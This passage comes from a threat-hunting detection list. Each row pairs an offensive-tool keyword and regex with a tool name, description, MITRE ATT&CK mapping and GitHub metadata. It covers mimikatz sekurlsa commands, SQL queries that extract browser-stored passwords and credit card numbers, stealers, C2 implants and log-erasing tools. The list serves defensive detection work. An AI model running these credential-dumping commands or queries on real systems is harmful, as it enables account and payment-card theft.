"*SeeYouCM-Thief.git*",".{0,1000}SeeYouCM\-Thief\.git.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*SeeYouCM-Thief-main*",".{0,1000}SeeYouCM\-Thief\-main.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - 
TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*sekurlsa *",".{0,1000}sekurlsa\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::backupkeys*",".{0,1000}sekurlsa\:\:backupkeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::bootkey*",".{0,1000}sekurlsa\:\:bootkey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::cloudap*",".{0,1000}sekurlsa\:\:cloudap.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::credman*",".{0,1000}sekurlsa\:\:credman.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::dpapi*",".{0,1000}sekurlsa\:\:dpapi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::dpapisystem*",".{0,1000}sekurlsa\:\:dpapisystem.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::ekeys*",".{0,1000}sekurlsa\:\:ekeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function dumps DPAPI backup keys for users who have logged on to the system","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::kerberos*",".{0,1000}sekurlsa\:\:kerberos.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::krbtgt*",".{0,1000}sekurlsa\:\:krbtgt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::livessp*",".{0,1000}sekurlsa\:\:livessp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::logonpasswords*",".{0,1000}sekurlsa\:\:logonpasswords.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function retrieves plaintext credentials from the LSA secrets in memory.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::minidump*",".{0,1000}sekurlsa\:\:minidump.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::msv*",".{0,1000}sekurlsa\:\:msv.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::process*",".{0,1000}sekurlsa\:\:process.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::pth*",".{0,1000}sekurlsa\:\:pth.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::ssp*",".{0,1000}sekurlsa\:\:ssp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::tickets*",".{0,1000}sekurlsa\:\:tickets.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::trust*",".{0,1000}sekurlsa\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::tspkg*",".{0,1000}sekurlsa\:\:tspkg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::wdigest*",".{0,1000}sekurlsa\:\:wdigest.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*SELECT * FROM EvilSignature*",".{0,1000}SELECT\s.{0,1000}\sFROM\sEvilSignature.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*SELECT * FROM EvilSignature*",".{0,1000}SELECT\s.{0,1000}\sFROM\sEvilSignature.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*SELECT * from smbsr WHERE *",".{0,1000}SELECT\s.{0,1000}\sfrom\ssmbsr\sWHERE\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*SELECT action_url, username_value, password_value FROM logins'*",".{0,1000}SELECT\saction_url,\susername_value,\spassword_value\sFROM\slogins\'.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*SELECT displayName FROM AntiVirusProduct*",".{0,1000}SELECT\sdisplayName\sFROM\sAntiVirusProduct.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards*",".{0,1000}SELECT\sname_on_card,\sexpiration_month,\sexpiration_year,\scard_number_encrypted\sFROM\scredit_cards.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile 
Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*SELECT SYSTEM_USER as 'Logged in as'* CURRENT_USER as 'Mapped as'*",".{0,1000}SELECT\sSYSTEM_USER\sas\s\'Logged\sin\sas\'.{0,1000}\sCURRENT_USER\sas\s\'Mapped\sas\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*self.sprayer.auth_O365*",".{0,1000}self\.sprayer\.auth_O365.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*self_delete.x64.o*",".{0,1000}self_delete\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","166","23","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" "*Self_Deletion_BOF*",".{0,1000}Self_Deletion_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 
- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","166","23","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" "*-selfdelete.exe -d:selfdelete*",".{0,1000}\-selfdelete\.exe\s\-d\:selfdelete.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*SeManageVolumeExploit.*",".{0,1000}SeManageVolumeExploit\..{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","65","15","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*SeManageVolumeExploit-main",".{0,1000}SeManageVolumeExploit\-main","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","65","15","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*Semperis/GoldenGMSA*",".{0,1000}Semperis\/GoldenGMSA.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* \]*",".{0,1000}send\s\\.{0,1000}\\\[\s\\\\.{0,1000}\\\$BASH\\\\.{0,1000}\s\=\s\\\\.{0,1000}\/bin\/bash\\\\.{0,1000}\s\-o\s\\\\.{0,1000}\\\$SHELL\\\\.{0,1000}\s\=\s\\\\.{0,1000}\/bin\/bash\\\\.{0,1000}\s\\\].{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*Send a file via DoH.*",".{0,1000}Send\sa\sfile\svia\sDoH\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*Send the payload with the grooms*",".{0,1000}Send\sthe\spayload\swith\sthe\sgrooms.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
